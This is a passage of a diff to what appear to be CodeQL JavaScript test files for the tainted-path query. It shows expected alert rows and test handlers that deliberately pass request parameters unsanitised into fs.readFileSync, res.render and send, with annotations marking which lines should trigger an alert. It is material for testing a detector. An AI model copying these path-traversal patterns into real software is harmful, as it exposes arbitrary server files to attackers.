normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:208:21:208:34 | normalizedPath | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:210:21:210:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:210:21:210:34 | normalizedPath | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:222:21:222:24 | path | normalizedPaths.js:214:35:214:48 | req.query.path | normalizedPaths.js:222:21:222:24 | path | This path depends on a $@. | normalizedPaths.js:214:35:214:48 | req.query.path | user-provided value | -| normalizedPaths.js:228:21:228:24 | path | normalizedPaths.js:226:35:226:48 | req.query.path | normalizedPaths.js:228:21:228:24 | path | This path depends on a $@. | normalizedPaths.js:226:35:226:48 | req.query.path | user-provided value | -| normalizedPaths.js:238:19:238:22 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:238:19:238:22 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | -| normalizedPaths.js:245:21:245:24 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:245:21:245:24 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | -| normalizedPaths.js:250:21:250:24 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:250:21:250:24 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | -| normalizedPaths.js:256:19:256:22 | path | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:256:19:256:22 | path | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:262:21:262:24 | path | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:262:21:262:24 | path | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:270:21:270:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:270:21:270:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:278:21:278:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:278:21:278:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:286:21:286:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:286:21:286:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:296:21:296:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:296:21:296:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:304:18:304:21 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:304:18:304:21 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:309:19:309:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:309:19:309:22 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:313:19:313:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:313:19:313:22 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:316:19:316:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:316:19:316:22 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:325:19:325:32 | normalizedPath | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:325:19:325:32 | normalizedPath | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:332:19:332:32 | normalizedPath | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:332:19:332:32 | normalizedPath | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:341:18:341:21 | path | normalizedPaths.js:339:32:339:45 | req.query.path | normalizedPaths.js:341:18:341:21 | path | This path depends on a $@. | normalizedPaths.js:339:32:339:45 | req.query.path | user-provided value | -| normalizedPaths.js:346:19:346:22 | path | normalizedPaths.js:339:32:339:45 | req.query.path | normalizedPaths.js:346:19:346:22 | path | This path depends on a $@. | normalizedPaths.js:339:32:339:45 | req.query.path | user-provided value | -| normalizedPaths.js:356:19:356:22 | path | normalizedPaths.js:354:14:354:27 | req.query.path | normalizedPaths.js:356:19:356:22 | path | This path depends on a $@. | normalizedPaths.js:354:14:354:27 | req.query.path | user-provided value | -| normalizedPaths.js:363:21:363:31 | requestPath | normalizedPaths.js:354:14:354:27 | req.query.path | normalizedPaths.js:363:21:363:31 | requestPath | This path depends on a $@. | normalizedPaths.js:354:14:354:27 | req.query.path | user-provided value | -| normalizedPaths.js:379:19:379:22 | path | normalizedPaths.js:377:14:377:27 | req.query.path | normalizedPaths.js:379:19:379:22 | path | This path depends on a $@. | normalizedPaths.js:377:14:377:27 | req.query.path | user-provided value | -| normalizedPaths.js:381:19:381:29 | slash(path) | normalizedPaths.js:377:14:377:27 | req.query.path | normalizedPaths.js:381:19:381:29 | slash(path) | This path depends on a $@. | normalizedPaths.js:377:14:377:27 | req.query.path | user-provided value | -| normalizedPaths.js:388:19:388:22 | path | normalizedPaths.js:385:35:385:45 | req.query.x | normalizedPaths.js:388:19:388:22 | path | This path depends on a $@. | normalizedPaths.js:385:35:385:45 | req.query.x | user-provided value | -| normalizedPaths.js:399:21:399:24 | path | normalizedPaths.js:385:35:385:45 | req.query.x | normalizedPaths.js:399:21:399:24 | path | This path depends on a $@. | normalizedPaths.js:385:35:385:45 | req.query.x | user-provided value | -| normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | normalizedPaths.js:407:45:407:55 | req.query.x | normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | This path depends on a $@. | normalizedPaths.js:407:45:407:55 | req.query.x | user-provided value | -| normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | normalizedPaths.js:408:38:408:48 | req.query.x | normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | This path depends on a $@. | normalizedPaths.js:408:38:408:48 | req.query.x | user-provided value | -| normalizedPaths.js:415:19:415:22 | path | normalizedPaths.js:412:35:412:45 | req.query.x | normalizedPaths.js:415:19:415:22 | path | This path depends on a $@. | normalizedPaths.js:412:35:412:45 | req.query.x | user-provided value | -| normalizedPaths.js:426:21:426:24 | path | normalizedPaths.js:412:35:412:45 | req.query.x | normalizedPaths.js:426:21:426:24 | path | This path depends on a $@. | normalizedPaths.js:412:35:412:45 | req.query.x | user-provided value | -| other-fs-libraries.js:11:19:11:22 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:11:19:11:22 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:12:27:12:30 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:12:27:12:30 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:13:24:13:27 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:13:24:13:27 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:14:27:14:30 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:14:27:14:30 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:16:34:16:37 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:16:34:16:37 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:17:35:17:38 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:17:35:17:38 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:19:56:19:59 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:19:56:19:59 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:24:35:24:38 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:24:35:24:38 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:40:35:40:38 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:40:35:40:38 | path | This path depends on a $@. | other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | -| other-fs-libraries.js:41:50:41:53 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:41:50:41:53 | path | This path depends on a $@. | other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | -| other-fs-libraries.js:42:53:42:56 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:42:53:42:56 | path | This path depends on a $@. | other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | -| other-fs-libraries.js:51:19:51:22 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:51:19:51:22 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:52:24:52:27 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:52:24:52:27 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:54:36:54:39 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:54:36:54:39 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:55:36:55:39 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:55:36:55:39 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:57:46:57:49 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:57:46:57:49 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:59:39:59:42 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:59:39:59:42 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:62:43:62:46 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:62:43:62:46 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:63:51:63:54 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:63:51:63:54 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:70:19:70:22 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:70:19:70:22 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | -| other-fs-libraries.js:71:10:71:13 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:71:10:71:13 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | -| other-fs-libraries.js:72:15:72:18 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:72:15:72:18 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | -| other-fs-libraries.js:76:19:76:19 | x | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:76:19:76:19 | x | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | -| other-fs-libraries.js:83:16:83:19 | path | other-fs-libraries.js:81:24:81:30 | req.url | other-fs-libraries.js:83:16:83:19 | path | This path depends on a $@. | other-fs-libraries.js:81:24:81:30 | req.url | user-provided value | -| prettier.js:7:28:7:28 | p | prettier.js:6:13:6:13 | p | prettier.js:7:28:7:28 | p | This path depends on a $@. | prettier.js:6:13:6:13 | p | user-provided value | -| prettier.js:11:44:11:44 | p | prettier.js:6:13:6:13 | p | prettier.js:11:44:11:44 | p | This path depends on a $@. | prettier.js:6:13:6:13 | p | user-provided value | -| pupeteer.js:9:28:9:34 | tainted | pupeteer.js:5:28:5:53 | parseTo ... t).name | pupeteer.js:9:28:9:34 | tainted | This path depends on a $@. | pupeteer.js:5:28:5:53 | parseTo ... t).name | user-provided value | -| pupeteer.js:13:37:13:43 | tainted | pupeteer.js:5:28:5:53 | parseTo ... t).name | pupeteer.js:13:37:13:43 | tainted | This path depends on a $@. | pupeteer.js:5:28:5:53 | parseTo ... t).name | user-provided value | -| sharedlib-repro.js:22:18:22:25 | filepath | sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | sharedlib-repro.js:22:18:22:25 | filepath | This path depends on a $@. | sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | user-provided value | -| tainted-access-paths.js:8:19:8:22 | path | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:8:19:8:22 | path | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:12:19:12:25 | obj.sub | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:12:19:12:25 | obj.sub | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:26:19:26:26 | obj.sub3 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:26:19:26:26 | obj.sub3 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:29:21:29:28 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:29:21:29:28 | obj.sub4 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:30:23:30:30 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:30:23:30:30 | obj.sub4 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:31:23:31:30 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:31:23:31:30 | obj.sub4 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:40:23:40:26 | path | tainted-access-paths.js:39:24:39:30 | req.url | tainted-access-paths.js:40:23:40:26 | path | This path depends on a $@. | tainted-access-paths.js:39:24:39:30 | req.url | user-provided value | -| tainted-access-paths.js:49:10:49:13 | path | tainted-access-paths.js:48:24:48:30 | req.url | tainted-access-paths.js:49:10:49:13 | path | This path depends on a $@. | tainted-access-paths.js:48:24:48:30 | req.url | user-provided value | -| tainted-promise-steps.js:11:19:11:35 | await pathPromise | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:11:19:11:35 | await pathPromise | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-promise-steps.js:12:44:12:47 | path | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:12:44:12:47 | path | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-require.js:7:19:7:37 | req.param("module") | tainted-require.js:7:19:7:37 | req.param("module") | tainted-require.js:7:19:7:37 | req.param("module") | This path depends on a $@. | tainted-require.js:7:19:7:37 | req.param("module") | user-provided value | -| tainted-require.js:12:29:12:47 | req.param("module") | tainted-require.js:12:29:12:47 | req.param("module") | tainted-require.js:12:29:12:47 | req.param("module") | This path depends on a $@. | tainted-require.js:12:29:12:47 | req.param("module") | user-provided value | -| tainted-require.js:14:11:14:29 | req.param("module") | tainted-require.js:14:11:14:29 | req.param("module") | tainted-require.js:14:11:14:29 | req.param("module") | This path depends on a $@. | tainted-require.js:14:11:14:29 | req.param("module") | user-provided value | -| tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:10:16:10:33 | req.param("gimme") | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:18:43:18:58 | req.param("dir") | tainted-sendFile.js:18:43:18:58 | req.param("dir") | tainted-sendFile.js:18:43:18:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:18:43:18:58 | req.param("dir") | user-provided value | -| tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | tainted-sendFile.js:24:37:24:48 | req.params.x | tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | This path depends on a $@. | tainted-sendFile.js:24:37:24:48 | req.params.x | user-provided value | -| tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | tainted-sendFile.js:25:34:25:45 | req.params.x | tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:25:34:25:45 | req.params.x | user-provided value | -| tainted-sendFile.js:30:16:30:33 | req.param("gimme") | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | tainted-sendFile.js:33:37:33:48 | req.params.x | tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:33:37:33:48 | req.params.x | user-provided value | -| tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | tainted-sendFile.js:35:34:35:45 | req.params.x | tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:35:34:35:45 | req.params.x | user-provided value | -| tainted-sendFile.js:38:43:38:58 | req.param("dir") | tainted-sendFile.js:38:43:38:58 | req.param("dir") | tainted-sendFile.js:38:43:38:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:38:43:38:58 | req.param("dir") | user-provided value | -| tainted-string-steps.js:8:18:8:34 | path.substring(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:8:18:8:34 | path.substring(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:10:18:10:31 | path.substr(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:10:18:10:31 | path.substr(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:11:18:11:30 | path.slice(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:11:18:11:30 | path.slice(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:15:18:15:46 | unknown ... , path) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:15:18:15:46 | unknown ... , path) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:17:18:17:28 | path.trim() | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:17:18:17:28 | path.trim() | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:27:18:27:36 | path.split(unknown) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:27:18:27:36 | path.split(unknown) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| torrents.js:7:25:7:27 | loc | torrents.js:5:13:5:38 | parseTo ... t).name | torrents.js:7:25:7:27 | loc | This path depends on a $@. | torrents.js:5:13:5:38 | parseTo ... t).name | user-provided value | -| typescript.ts:12:29:12:32 | path | typescript.ts:9:24:9:30 | req.url | typescript.ts:12:29:12:32 | path | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:21:39:21:43 | path3 | typescript.ts:9:24:9:30 | req.url | typescript.ts:21:39:21:43 | path3 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:24:39:24:43 | path4 | typescript.ts:9:24:9:30 | req.url | typescript.ts:24:39:24:43 | path4 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:32:29:32:33 | path6 | typescript.ts:9:24:9:30 | req.url | typescript.ts:32:29:32:33 | path6 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | This path depends on a $@. | views.js:1:43:1:55 | req.params[0] | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js index fd768fecfff8..7e9d09b0d4af 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js @@ -6,65 +6,54 @@ var fs = require('fs'), ; var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - // BAD: This could read any file on the file system - res.write(fs.readFileSync(path)); + res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system - // BAD: This could still read any file on the file system - res.write(fs.readFileSync("/home/user/" + path)); + res.write(fs.readFileSync("/home/user/" + path)); // $ Alert - This could still read any file on the file system if (path.startsWith("/home/user/")) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (path.indexOf("secret") == -1) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (fs.existsSync(path)) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (path === 'foo.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list if (path === 'foo.txt' || path === 'bar.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list if (path === 'foo.txt' || path === 'bar.txt' || someOpaqueCondition()) - res.write(fs.readFileSync(path)); // BAD: Path is incompletely compared to white-list + res.write(fs.readFileSync(path)); // $ Alert - Path is incompletely compared to white-list path = sanitize(path); - res.write(fs.readFileSync(path)); // GOOD: Path is sanitized + res.write(fs.readFileSync(path)); // OK - Path is sanitized - path = url.parse(req.url, true).query.path; - // GOOD: basename is safe + path = url.parse(req.url, true).query.path; // $ Source + // OK - basename is safe res.write(fs.readFileSync(pathModule.basename(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.dirname(path))); - // GOOD: extname is safe + res.write(fs.readFileSync(pathModule.dirname(path))); // $ Alert - taint is preserved + // OK - extname is safe res.write(fs.readFileSync(pathModule.extname(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.join(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.join(x, y, path, z))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.normalize(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.relative(x, path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.relative(path, x))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.resolve(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.resolve(x, y, path, z))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.toNamespacedPath(path))); + res.write(fs.readFileSync(pathModule.join(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.join(x, y, path, z))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.normalize(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.relative(x, path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.relative(path, x))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.resolve(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.resolve(x, y, path, z))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.toNamespacedPath(path))); // $ Alert - taint is preserved }); var server = http.createServer(function(req, res) { // tests for a few uri-libraries - res.write(fs.readFileSync(require("querystringify").parse(req.url).query)); // NOT OK - res.write(fs.readFileSync(require("query-string").parse(req.url).query)); // NOT OK - res.write(fs.readFileSync(require("querystring").parse(req.url).query)); // NOT OK + res.write(fs.readFileSync(require("querystringify").parse(req.url).query)); // $ Alert + res.write(fs.readFileSync(require("query-string").parse(req.url).query)); // $ Alert + res.write(fs.readFileSync(require("querystring").parse(req.url).query)); // $ Alert }); (function(){ @@ -72,7 +61,7 @@ var server = http.createServer(function(req, res) { var express = require('express'); var application = express(); - var views_local = (req, res) => res.render(req.params[0]); + var views_local = (req, res) => res.render(req.params[0]); // $ Alert application.get('/views/*', views_local); var views_imported = require("./views"); @@ -81,12 +70,12 @@ var server = http.createServer(function(req, res) { })(); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - res.write(fs.readFileSync(fs.realpathSync(path))); + res.write(fs.readFileSync(fs.realpathSync(path))); // $ Alert fs.realpath(path, function(err, realpath){ - res.write(fs.readFileSync(realpath)); + res.write(fs.readFileSync(realpath)); // $ Alert } ); @@ -100,7 +89,7 @@ var server = http.createServer(function(req, res) { path = path.replace(/\.\./g, ''); // remove all ".." } - res.write(fs.readFileSync(path)); // OK. Is sanitized above. + res.write(fs.readFileSync(path)); // OK - Is sanitized above. }); var server = http.createServer(function(req, res) { @@ -113,70 +102,70 @@ var server = http.createServer(function(req, res) { path = path.replace(/\.\./g, ''); // remove all ".." } - res.write(fs.readFileSync(path)); // OK. Is sanitized above. + res.write(fs.readFileSync(path)); // OK - Is sanitized above. }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - require('send')(req, path); // NOT OK + require('send')(req, path); // $ Alert }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var split = path.split("/"); - fs.readFileSync(split.join("/")); // NOT OK + fs.readFileSync(split.join("/")); // $ Alert - fs.readFileSync(prefix + split[split.length - 1]) // OK + fs.readFileSync(prefix + split[split.length - 1]) - fs.readFileSync(split[x]) // NOT OK - fs.readFileSync(prefix + split[x]) // NOT OK + fs.readFileSync(split[x]) // $ Alert + fs.readFileSync(prefix + split[x]) // $ Alert var concatted = prefix.concat(split); - fs.readFileSync(concatted.join("/")); // NOT OK + fs.readFileSync(concatted.join("/")); // $ Alert var concatted2 = split.concat(prefix); - fs.readFileSync(concatted2.join("/")); // NOT OK + fs.readFileSync(concatted2.join("/")); // $ Alert - fs.readFileSync(split.pop()); // NOT OK + fs.readFileSync(split.pop()); // $ Alert }); var server = http.createServer(function(req, res) { - let path = 